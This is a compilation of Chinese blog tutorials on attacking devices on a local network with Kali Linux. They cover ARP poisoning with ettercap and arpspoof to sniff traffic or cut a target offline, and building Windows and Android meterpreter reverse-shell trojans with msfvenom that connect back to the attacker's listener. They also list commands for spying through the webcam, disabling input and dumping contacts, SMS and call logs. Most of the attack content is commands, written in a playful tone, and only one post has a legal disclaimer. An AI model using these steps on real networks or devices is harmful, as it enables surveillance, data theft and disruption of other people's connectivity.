kali linux 局域网

2016-09-28 13:59:26 u012749168 阅读数 23280

1第一步,设置本机启动ip转发功能,不转发的话,arp欺骗的时候,别人就上不去网络

2第二部,开启ettercap,选择Sniff菜单里的Uniffied sniffing

3第三步,选择eth0网卡,wlan的话就选wlan0,然后点确定


4第四部,点击Hosts下的Scan for hosts



5第五步,点击Hosts下的Host list列出所有的ip,并把你想要攻击的ip选中(如果这里也是网关的话,会获得所有人的包),点击Add to Target1,选中网关ip,点击Add to Target2


6第六步,选择Mitm下的ARP poisoning


7第七步,选中如下,点击确定

8第八步,选择start下的Start sniffing


9第九步,打开控制台,输入如下,弹出driftnet,如果有图片的数据包流过,就会把图像显示出来(好像很不道德)



2017-12-24 15:50:15 wy_bk 阅读数 12808

特别声明:
我们学习研究网络安全技术的目的应是为了维护网络世界的安全,保护自己和他人的私有信息不被非法窃取和传播。请您遵守您所在地的法律,请勿利用本文所介绍的相关技术做背离道德或者违反法律的事情。

Special statement:
The purpose of our study of cyber security technology should be to maintain the security of the cyber world and protect the private information of ourselves and others from being illegally stolen and disseminated. Please comply with your local laws. Do not take advantage of the relevant technology introduced in this article to do anything that deviates from morality or against the law.

前言:

ARP攻击是基于ARP协议的工作模式进行的,关于ARP协议和ARP攻击的基础知识请查看我的这篇博文ARP协议与ARP攻击入门

ARP攻击能够实现的技术前提有两个,一是作为攻击者的计算机需要和被攻击者的计算机在一个局域网中,二是作为攻击者的计算机需要知道被攻击者计算机的局域网IP。本文将模拟真实的攻击过程,在不与被攻击的计算机发生物理接触的情况下实现对其的局域网断网攻击。

网络拓扑图

图 1
图 1

注:在这里,作为攻击者的计算机使用的是安装在VMware Workstation中的Kali Linux,我们需要在VMware的设置中将Kali的联网方式改为“桥接模式”,并且不要勾选“复制物理网络连接状态”。

获取目标主机IP

在这里,我们使用Ettercap对内网进行扫描以获取目标主机IP和网关的信息。输入命令:

ettercap -G

打开Ettercap的GUI界面:
图 2
图 2

依次点击“Sniff(嗅探) -> Unified sniffing(统一嗅探)”,之后弹出如下界面让选择进行扫描的网络接口(Network interface):
图 3
图 3

这里我们使用默认的eth0端口。点击“OK”。

之后依次点击“Hosts(主机) -> Scan for hosts(扫描主机)”。
这时会出现一个进度条,等待进度条结束,依次点击“Hosts -> Hosts list(主机列表)”即可显示本机所在局域网中除本机之外,当前已连接至网络的设备的IP地址和MAC地址:
图 4
图 4

注:Ettercap扫描结果的第一项一般是本局域网中的网关,如图中的192.168.50.1就是实验时局域网中的默认网关。

这样我们就获得了目标主机的IP和本局域网的网关。

对局域网内的目标主机实施断网攻击

我们使用Kali Linux中的Arpspoof进行ARP攻击。

在实施断网攻击前,我们先测试一下目标主机192.168.50.130是不是能上网,输入命令:

ping www.baidu.com

发现可以Ping通,说明目标主机在攻击开始之前是可以上网的。

在我们的攻击机上,即Kali中,输入命令:

arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
e.g:
arpspoof -i eth0 -t 192.168.50.130 192.168.50.1

回车就开始对目标主机进行断网攻击了,此时我们在目标主机上执行命令:

ping www.baidu.com

就会返回一个错误提示:“Ping请求找不到主机www.baidu.com”。

通过上述命令产生的Arpspoof的攻击进程不会自动停止,除非当前攻击链路被中断,如攻击机关机或者断开与当前局域网的连接,或目标机关机或者断开与当前局域网的连接或者更改了其在当前局域网内的IP地址。我们可以在Arpspoof进程所在终端上使用“Ctrl+Z”手动关闭Arpspoof的攻击进程。

关闭Arpspoof的攻击进程后,之前被攻击的目标主机一般会在几秒钟的时间内自动恢复正常的网络连接。

附:
Ettercap0.8.2的帮助信息(命令ettercap -help):

ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team


Usage: ettercap [OPTIONS] [TARGET1] [TARGET2]

TARGET is in the format MAC/IP/IPv6/PORTs (see the man for further detail)

Sniffing and Attack options:
  -M, --mitm <METHOD:ARGS>    perform a mitm attack
  -o, --only-mitm             don't sniff, only perform the mitm attack
  -b, --broadcast             sniff packets destined to broadcast
  -B, --bridge <IFACE>        use bridged sniff (needs 2 ifaces)
  -p, --nopromisc             do not put the iface in promisc mode
  -S, --nosslmitm             do not forge SSL certificates
  -u, --unoffensive           do not forward packets
  -r, --read <file>           read data from pcapfile <file>
  -f, --pcapfilter <string>   set the pcap filter <string>
  -R, --reversed              use reversed TARGET matching
  -t, --proto <proto>         sniff only this proto (default is all)
      --certificate <file>    certificate file to use for SSL MiTM
      --private-key <file>    private key file to use for SSL MiTM

User Interface Type:
  -T, --text                  use text only GUI
       -q, --quiet                 do not display packet contents
       -s, --script <CMD>          issue these commands to the GUI
  -C, --curses                use curses GUI
  -D, --daemon                daemonize ettercap (no GUI)
  -G, --gtk                   use GTK+ GUI

Logging options:
  -w, --write <file>          write sniffed data to pcapfile <file>
  -L, --log <logfile>         log all the traffic to this <logfile>
  -l, --log-info <logfile>    log only passive infos to this <logfile>
  -m, --log-msg <logfile>     log all the messages to this <logfile>
  -c, --compress              use gzip compression on log files

Visualization options:
  -d, --dns                   resolves ip addresses into hostnames
  -V, --visual <format>       set the visualization format
  -e, --regex <regex>         visualize only packets matching this regex
  -E, --ext-headers           print extended header for every pck
  -Q, --superquiet            do not display user and password

LUA options:
      --lua-script <script1>,[<script2>,...]     comma-separted list of LUA scripts
      --lua-args n1=v1,[n2=v2,...]               comma-separated arguments to LUA script(s)

General options:
  -i, --iface <iface>         use this network interface
  -I, --liface                show all the network interfaces
  -Y, --secondary <ifaces>    list of secondary network interfaces
  -n, --netmask <netmask>     force this <netmask> on iface
  -A, --address <address>     force this local <address> on iface
  -P, --plugin <plugin>       launch this <plugin>
  -F, --filter <file>         load the filter <file> (content filter)
  -z, --silent                do not perform the initial ARP scan
  -6, --ip6scan               send ICMPv6 probes to discover IPv6 nodes on the link
  -j, --load-hosts <file>     load the hosts list from <file>
  -k, --save-hosts <file>     save the hosts list to <file>
  -W, --wifi-key <wkey>       use this key to decrypt wifi packets (wep or wpa)
  -a, --config <config>       use the alterative config file <config>

Standard options:
  -v, --version               prints the version and exit
  -h, --help                  this help screen

end
更多内容请访问我的个人网站荒原之梦

2020-01-17 15:17:57 sievr 阅读数 1248

kali机:192.168.198.134
win10:192.168.198.1
我们先来查看下自己的IP地址
在这里插入图片描述
接着我们使用fping来扫描一下局域网内的所有IP

fping -g IP/24 -->扫描局域网内所有IP

在这里插入图片描述
攻击正式开始
1.我们先用msfvenom来生成一个木马文件,它将在root目录生成一个名叫shell.exe文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.134 lport=5555 -f exe R > /root/shell.exe

LHOST -->本地的IP地址
LPORT -->反向连接到主机的端口
R> -->木马生成的保存输出路径

在这里插入图片描述
2.打开msfconsole,键入以下代码

msf > use exploit/multi/handler -->设置模块
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -->设置payload为反向tcp连接
msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址
msf exploit(multi/handler) > set lport 5555 -->设置端口,需要跟前面生成的木马端口一致

在这里插入图片描述
开始攻击

exploit -->执行攻击命令

在这里插入图片描述
3.现在我把马放在自己本机上,由于隐私问题我们不放图片了
现在我们来运行shell.exe,然而并没有什么反应,但实际上木马已经运行了,kali也监听到了
在这里插入图片描述
4.开始搞事
现在你又可以为所欲为了
部分指令如下

uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all] -->开启或禁止键盘/鼠标
uictl disable mouse -->禁用鼠标
uictl disable keyboard -->禁用键盘

webcam摄像头命令
webcam_list -->查看摄像头
webcam_snap -->通过摄像头拍照
webcam_stream -->通过摄像头开启视频
 
 execute执行文件
execute -->在目标机中执行文件
execute -H -i -f cmd.exe -->创建新进程cmd.exe,-H不可见,-i交互

详细指令请见:先知社区
我们以查看自己当前所在用户组为例
执行shell来运行cmd
在这里插入图片描述
可以看出我们的用户名叫sievr,归属于sievr用户组
然后我们来验证一下
在这里插入图片描述
完全正确
好的本次教程就到这里,有不懂的欢迎私信!

2019-05-21 16:08:00 Geeksongs 阅读数 10293

kali linux查看局域网下所有IP,并对指定IP实施局域网内攻击

首先我们打开我们熟悉的kali linux操作系统,利用指令:

ifconfig

来确认本机的ip地址

确认了本机的ip地址之后,利用一下的指令查看局域网下所有ip:

fping -g 本机IP地址/24

如下图所示:

因为自己的小米手机也连接到了同一个wifi下面,所以正好发现这里所嗅探到的ip地址:192.168.1.136是我手机的ip地址,与其刚好符合。

因此我们开始实施攻击,输入以下指令:

arpspoof -i eth0 -t 192.168.1.136 192.168.1.1

前面的ip地址是手机的ip地址,后面的那个ip地址是手机的默认网关地址

在下面的mac地址跳出来之后,我们会发现我们的手机无论如何都不能够上网了,如果想要停止这个攻击,则输入:

ctrl+z

即可,如下图所示:

这样这个攻击就停止了,我个人感觉这个过程实在是太神奇了有没有啊,哈哈哈

posted @ 2019-05-21 16:08 Geeksongs 阅读(...) 评论(...) 编辑 收藏
2020-01-17 14:44:31 sievr 阅读数 878

kali机:192.168.198.134
安卓机:192.168.198.1
安卓版本:5.0.1
我们先来查看下自己的IP地址
在这里插入图片描述
接着我们使用fping来扫描一下局域网内的所有IP

fping -g IP/24 -->扫描局域网内所有IP

在这里插入图片描述
攻击正式开始
1.我们先用msfvenom来生成一个木马文件,它将在root目录生成一个名叫shell.apk文件

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.198.134 LPORT=5555 R > /root/shell.apk

LHOST -->本地的IP地址
LPORT -->反向连接到主机的端口
R> -->木马生成的保存输出路径

在这里插入图片描述
2.打开msfconsole,键入以下代码

msf > use exploit/multi/handler -->设置模块
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp -->设置payload为反向tcp连接
msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址
msf exploit(multi/handler) > set lport 5555 -->设置端口,需要跟前面生成的木马端口一致

在这里插入图片描述
开始攻击

exploit -->执行攻击命令

在这里插入图片描述
3.现在需要把木马文件安装到安卓手机上去,我这里已经安装好了
在这里插入图片描述
安装完成会出现一个叫MainActivity的应用
现在我们尝试来打开它,然而并没有什么反应,但实际上木马已经运行了,kali也监听到了
在这里插入图片描述
4.开始搞事
现在你就可以为所欲为了,我这里给你们一些指令

cd -->目录切换,命令:cd / 切换到根目录
search -->搜索文件,命令:search text.jpg
download -->下载文件,命令:download test.jpg
webcam_list -->查看摄像头列表,因为手机都是前置和后置摄像头了
webcam_snap -->拍照一张,需要选用前置或者后置摄像头,命令:webcam_snap -i 1
webcam_stream -->开启摄像头视频监控,同上,命令:webcam_stream -i 1
安卓系统相关命令:
check_root -->查看当前安卓是否已经root
dump_calllog -->下载通话记录
dump_contacts -->下载通讯录
dump_sms -->下载短信记录
geolocate -->利用谷歌地图定位(需要安装谷歌地图)

我们以导出通讯录为例
在这里插入图片描述
可以看见已经导出来了,文件名为contacts_dump_20200117010906.txt
然后我们来验证一下是不是真的
在这里插入图片描述
是不是很快乐
好的本次教程就到这里,有不懂的欢迎私信!